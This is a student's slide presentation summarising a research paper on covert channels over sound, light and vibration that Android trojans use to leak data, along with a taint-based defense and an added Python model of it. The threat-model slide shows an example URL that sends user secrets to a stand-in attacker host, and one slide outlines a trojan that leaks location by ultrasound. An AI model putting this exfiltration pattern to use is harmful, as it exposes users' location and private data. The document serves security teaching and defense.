Physical media covert channels on smart mobile devices

Post on 13-Apr-2017


PHYSICAL MEDIA COVERT CHANNELS ON SMART MOBILE DEVICES - ED NOVAK, YUTAO TANG, ZIJIANG HAO, QUN LI, YIFAN ZHANG

Presenter: Harshitha Chidananda

TABLE OF CONTENTS

• Introduction
• Main problem
• Main points and contributions
• Challenges
• Recent work
• Strengths and Weaknesses
• Open issues/ Direction of future research
• My thoughts
• Summary and conclusion
• Key technical points
  • PMCC
  • Trojan Horse Malware
  • 5 example PMCCs
  • Defense mechanism
  • Evaluation

Fundamental shift for computing
• Carry sensitive information
• Equipped with physical interface hardware

MAIN PROBLEM

• Devices carry sensitive information about the user
• Malware in many applications
• Applications access the user’s information without permission

MAIN POINTS AND CONTRIBUTIONS

• Information leakage malware
  • Uses covert channels over physical “real-world” media, such as sound or light
  • First to use PMCC (Physical Media Covert Channels)
• Malware advantages:
  • New form
  • Stealthy
  • State-of-the-art defenses
• Privilege escalation
• Information leakage
• Defense mechanism
  • Balances security with usability

CHALLENGES

• Speed
  • As little as 100 bits per second is enough to pose a serious threat
• Stealth
  • Difficult to defend against
  • They must go unnoticed by the user
  • Appear to be benign from the point of view of the software
  • Differentiate between benign and malicious sensor use
  • Not interrupt the user with confirmation dialogs

KEY TECHNICAL POINTS

• Propose a new class of covert channels for smart mobile devices that utilize real-world interfaces
  • Generalized as “physical medium covert channels” (PMCC)
  • High stealth
  • High speed
• Design and implementation of five example PMCCs
• Use PMCCs to design a new variant of trojan horse malware that appears to be benign but actually leaks sensitive user information
• Propose and implement a novel defense scheme that takes a framework approach
• Evaluate prototypes of each covert channel and the defense mechanism

RECENT WORK

Defense mechanisms
• Taint analysis
  • Taint analysis can be used to identify sensitive information as it flows through an application, and to notify the user or stop this sensitive information from leaving the device and being leaked.
• Elaborate security policy mechanisms
  • Internal computation for security reasons
• Application market curation
  • Market curation techniques aim to identify and remove malicious applications from the market before users even have a chance to install them.

PART 1: THREAT MODEL

• Send information over the Internet without requesting the Internet permission
• Creating applications that look normal
• Dual run using “ScheduledExecutorService” (Android timing mechanism)
• Accessing sensitive information

Android applications can ask the browser to open URLs on their behalf without declaring the Internet permission. The attacker can include some CGI parameters (e.g., attackerhost.com/collector?usersecret=val) to transmit sensitive information to their own controlled host.

PART 2: TROJAN HORSE MALWARE DESIGN

Example Trojan Application: Jog-Log
• The application asks for GPS and microphone permission
• User uses jogging app while jogging
• Later at night, app uses ScheduledExecutorService
• Uses PMCC to transmit location information
  • Speaker is used to produce ultrasonic signal
  • Microphone is used to decode the ultrasound signal
  • Forms URL with the attacker’s host as a domain
  • User’s location as CGI parameter
• The attacker sets up a special web server to respond to these requests
  • Records CGI parameters in a file associated with the IP address of the user
• The attacker can now find the street address

PART 3: COVERT CHANNEL DESIGN

Implementation of five physical media covert channels:
• Ultrasound
• Speaker and Accelerometer
• Vibration and Accelerometer
• Flash and Camera
• User and Gyroscope

PART 4: DEFENSE SYSTEM ARCHITECTURE

PART 4: STAGE 1 - GUARD SERVICE

GuardService exposes 3 methods:
• .add(component, device, tag)
• .remove(component, device)
• .lookup(component, device)

• Component begins using a sender device
  • .add() is called
  • Taint-tag from the data flowing is stored in the GuardService
• .lookup() is called
  • Retrieve taint-tag from any active sender devices
• .remove() is called
  • When sender services are no longer needed
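
A minimal model of the GuardService bookkeeping described above, added here as an illustration; it is not code from the paper or from these slides. The sender-to-receiver table follows the page's list of example channels, while the taint-tag values, the component names and the needs_treatment helper are assumptions.

```python
from collections import defaultdict

# Sender -> receiver pairings from the page's list of example channels
# (the "user and gyroscope" channel has no sender device, so it is omitted).
CHANNELS = {
    "speaker": {"microphone", "accelerometer"},
    "vibration": {"accelerometer"},
    "flash": {"camera"},
}

# Constructed taint tags (bit flags); the real tag values are not on the page.
TAINT_NONE, TAINT_LOCATION, TAINT_CONTACTS = 0x0, 0x1, 0x2


class GuardService:
    """Tracks which components drive sender devices and with what taint."""

    def __init__(self):
        self._active = defaultdict(dict)  # sender device -> {component: tag}

    def add(self, component, device, tag):
        # A component starts using a sender device; remember the taint tag
        # of the data flowing into it (OR-ed if it is already registered).
        prev = self._active[device].get(component, TAINT_NONE)
        self._active[device][component] = prev | tag

    def remove(self, component, device):
        # The component no longer needs the sender device.
        self._active[device].pop(component, None)
        if not self._active[device]:
            del self._active[device]

    def lookup(self, component, device):
        # A component opens receiver `device`: combine the tags of every
        # active sender that can reach it, whichever component drives it.
        tag = TAINT_NONE
        for sender, receivers in CHANNELS.items():
            if device in receivers:
                for t in self._active.get(sender, {}).values():
                    tag |= t
        return tag


def needs_treatment(guard, component, receiver):
    """True when a treatment should be applied before `receiver` is used."""
    return guard.lookup(component, receiver) != TAINT_NONE
```

A non-zero lookup result is the point at which one of the Stage 2 treatments would be selected.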

PART 4: STAGE 2 - TREATMENT

• Alert the user
  • Weakest choice
• Choose One
  • One of the devices is turned off
  • Tunable parameter
• Dynamically Switch
  • Switch dynamically between two sensors
• Rate Limit
  • For devices that need 2 sensors to work (flash and camera)
  • Limit the rate at which the device can be used
• Altering the Signal
  • Increase error rate
  • Careful not to alter useful information

PART 5: EVALUATION


STRENGTHS AND WEAKNESSES

Strengths
• Good evaluation of each covert channel and defense mechanisms
• Succeeds
• Good results
• Describes about developing a good malware
• Describes good defense mechanisms
• Easy to read

Weaknesses
• Repetitive
• No user study

OPEN ISSUES/ DIRECTION FOR FUTURE RESEARCH

• Does not focus on the case where the attacker tries to use some physical medium covert channel to communicate with another proximal device
• Experiments on Apple smartphones
• Influence of defense mechanisms on performance

MY THOUGHTS

• Simple English with few terms that needed to be Googled
• Pictorially eye catching
• Well explained
• Best way to make reader understand the importance of security
• Gave broader perception
• Realistic overview
• Good illustrations

SUMMARY AND CONCLUSION

• First to use Physical Media Covert Channels
• Designed specifically for mobile devices
• New form of malware
• Novel defense mechanism
• Alert community of potential threat

Thank You! QUESTIONS?